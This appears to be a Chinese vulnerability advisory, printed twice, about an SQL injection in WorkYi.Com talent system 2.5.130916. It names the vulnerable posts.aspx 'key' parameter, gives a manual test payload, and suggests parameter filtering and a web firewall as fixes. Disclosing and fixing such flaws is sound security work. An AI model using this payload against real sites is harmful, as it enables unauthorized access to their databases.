VULHUB ™

### 0x01 漏洞简述 WorkYi.Com工作易人才系统是一款基于微软.NET平台，使用 C# + MSSQL2000数据库独立开发和构架的一个强大的人才系统。WorkYi.Com工作易人才系统采用三层架构模式开发，功能易于进行扩展和二次开发，可面向中小站点提供网站建设解决方案。 两年多来，站长一直致力更新和完善网站系统功能，力保将最实用的功能开发出来并免费提供给各位会员。 官方主页：http://www.workyi.com/  影响版本：version:2.5.130916 ### 0x02 漏洞细节 漏洞地址： http://**.**.**.**/hunter/posts.aspx?key= 手工测试palyload： key=' and @@version=0 or '%'='%    ### 0x03 修复方案 1、过滤漏洞文件参数 2、使用加速乐等防护产品

### 0x01 漏洞简述 WorkYi.Com工作易人才系统是一款基于微软.NET平台，使用 C# + MSSQL2000数据库独立开发和构架的一个强大的人才系统。WorkYi.Com工作易人才系统采用三层架构模式开发，功能易于进行扩展和二次开发，可面向中小站点提供网站建设解决方案。 两年多来，站长一直致力更新和完善网站系统功能，力保将最实用的功能开发出来并免费提供给各位会员。 官方主页：http://www.workyi.com/  影响版本：version:2.5.130916 ### 0x02 漏洞细节 漏洞地址： http://**.**.**.**/hunter/posts.aspx?key= 手工测试palyload： key=' and @@version=0 or '%'='%    ### 0x03 修复方案 1、过滤漏洞文件参数 2、使用加速乐等防护产品